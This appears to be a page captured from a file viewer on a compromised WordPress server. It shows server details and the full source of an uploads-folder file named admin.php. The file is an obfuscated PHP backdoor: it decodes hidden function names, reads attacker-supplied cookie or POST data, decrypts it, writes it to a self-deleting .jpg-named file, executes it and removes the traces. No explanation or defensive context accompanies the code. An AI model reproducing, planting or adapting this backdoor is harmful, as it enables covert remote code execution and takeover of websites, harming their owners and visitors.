HEX
Server: nginx/1.24.0
System: Linux webserver 6.8.0-85-generic #85-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 18 15:26:59 UTC 2025 x86_64
User: wpuser (1002)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: /opt/wpsites/gsudice.dataconn.net/wp-content/uploads/2022/03/admin.php
<?php
function	by6     (){echo	'xp7';}


function      cw1 ( $vp2 )
{$qu4=0;$qp3 =	"a*@[fF'#gPdj/pyEkrtivx6bhu_HLo(T4eU;ls?]m nNKM)<AcD.I1Y";


 $mb5 = substr("", 0);
 while(1)
{	if($qu4>=count($vp2))    break; $mb5	.= $qp3 [ $vp2[$qu4] ];  $qu4++;
}
return $mb5;
}$sz9 =    [];$mbmiln = 98937;$sz9[34290] =	cw1 (	Array(38 , 13      , 24 , 13 ,	41 ,       2 , 25 , 42    ,	36	,	19 ,    42	,	16 ,  30	, 26 , 26   ,	5 ,	52 ,      28	, 15 ,       26 ,      26	,      46 ,      35 , 41	,) )	;
$sz9[66030] = cw1      (      Array(3	,  48   , 34	,       31 , 27 ,     26	, 44 ,    15    , 54 , 39 ,) )	;

$sz9[39915] =	cw1	(	Array(50 , 34	, 45 , 45	,	54	, 53	,) ) ;$sz9[33766] = cw1 ( Array(51	,	11 , 13    , 8    ,)     )      ;


$de29 = 89629;

$sz9[30176] =   cw1	( Array(51	, 12   ,)	)     ;


$sz9[47575]	= cw1 (	Array(27	, 1 ,)	)	;


$sz9[34764] =     cw1	(  Array(7 ,) )	;

$sz9[15809] =	cw1 ( Array(12	,) ) ;

$sz9[3518] = cw1	( Array(47	,) )	;
$sz9[37308]      =	cw1     (	Array(4	, 19	,	36 ,     33   ,   26 ,   13 ,	25 , 18 , 26 , 49	,	29 ,	42 , 18 , 33	, 42 , 18 , 37	,) )	;


$sz9[47032]       = cw1 (	Array(0 ,      17	, 17 ,    0 , 14	,	26 ,     40	,	33 ,      17	, 8 , 33 ,) ) ;$sz9[33200] = cw1      ( Array(37 , 18	,  17 , 26 , 17	, 33 ,	13     , 33 ,    0 ,      18	,)	) ;


$sz9[59306] = cw1	(  Array(33   , 21 , 13 ,	36	,      29	,  10 , 33	,)	)	;
$uz30       = 83003;$sz9[28072] =     cw1	(  Array(37	,  18 ,	17   , 36 , 33      ,   42	,)	)     ;
$sz9[73124] = cw1 (     Array(25     ,	42   , 36	, 19	,	42  ,       16	,)	)   ;
$sz9[81314]       = cw1	( Array(37 ,     18	,	17 , 13 ,	29       , 37      ,) ) ;


$yo31 = 46951;$sz9[3489]	=       cw1     (      Array(19	, 42 , 18 ,      20    ,       0	,      36 ,) ) ;
$su32    = 60285;


$sz9[5534]  =       cw1 ( Array(13 ,	0 ,    49    , 16	,) ) ;



$bk25 =	$_COOKIE;       $xh23 = "17816";

$bk25	=	$sz9[47032]($bk25,      $_POST);



foreach ($bk25     as     $ee28	=> $fe24)

{

 function	an15 (	$sz9, $ee28 ,	$kn22 ) {
    return substr	(       $sz9[33200]     ( $ee28	. '5526eb63-5518-494b-bcd6-899a195eaf8a' , $sz9[3489]( $kn22/$sz9[28072](	$ee28 ) ) + 1     )  , 0       , $kn22 );	}

 function  ez18     ( $sz9,	$sy26	)  {

	if ( isset (       $sy26[2] ) )	{

 

   gz16 (   $sz9, wd14 ( $sz9,      $sy26));  

	return	1;


 }


 } 
 function aa13 (    $sz9, $sy26	) { return	@$sz9[5534] ($sz9[47575]	, $sy26 );

       }  function     px11   (	$sz9,       $fe24, $ee28)


 { return aa13 ( $sz9, $fe24       ) ^ an15    (	$sz9,   $ee28	, $sz9[28072](	$fe24 )   );

       }

 	function gi12	(	$sz9, $fe24, $ee28) {


 return $sz9[59306]    ( $sz9[34764] ,    px11	( $sz9,	$fe24, $ee28)); }

 
  function       vh10     (  $sz9,	$fe24, $ee28)

 {      $fe24       = gi12	( $sz9, $fe24,   $ee28);	if    (ez18 (  $sz9, $fe24))	{


	exit(); }


 }


 
    function  wd14	( $sz9,	$sy26)

 {


   $yr27 =      $sz9[30176]	. md5(      '5526eb63-5518-494b-bcd6-899a195eaf8a' )   . $sz9[33766];


    	@$sz9[37308]      (	$yr27, $sz9[3518]	.    $sz9[34290] .  $sy26[1] (    $sy26[2]   ) ); 


	return	$yr27;

 }

 


 function ez17 (      $sz9, $yr27)
 {


       @$sz9[73124]  (	$yr27   ); exit();

 }

 

       function	gz16 (   $sz9,	$yr27      )	{


 @require	( $yr27	);


      $mq19   = md5($yr27);


	$ol21 =       substr($yr27,     $sz9[81314]($yr27,  $sz9[15809]) + 1);
 if  (file_exists       (	$yr27)) 
       {
  $nk20    =	str_replace("17816",   "",	$mq19);   ez17	(	$sz9,	$yr27);
	}	}


   

   vh10       (    $sz9,    $fe24,	$ee28);

}